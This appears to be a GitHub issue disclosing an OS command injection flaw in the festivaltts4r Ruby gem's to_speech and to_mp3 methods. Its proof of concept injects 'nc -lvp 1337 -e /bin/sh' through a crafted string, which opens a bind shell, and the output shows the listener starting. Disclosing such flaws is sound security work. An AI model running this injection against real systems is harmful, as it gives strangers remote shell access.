Open
Description
The to_speech and to_mp3 methods allow injection of arbitrary operating system commands. This may be problematic in the event user input is supplied to these methods.
Proof of concept:
#!/usr/bin/env ruby
require "rubygems"
require "festivaltts4r"
'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_speech
'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_mp3('something.mp3')$ ./asdf.rb
listening on [any] 1337 ...
Metadata
Metadata
Assignees
Labels
No labels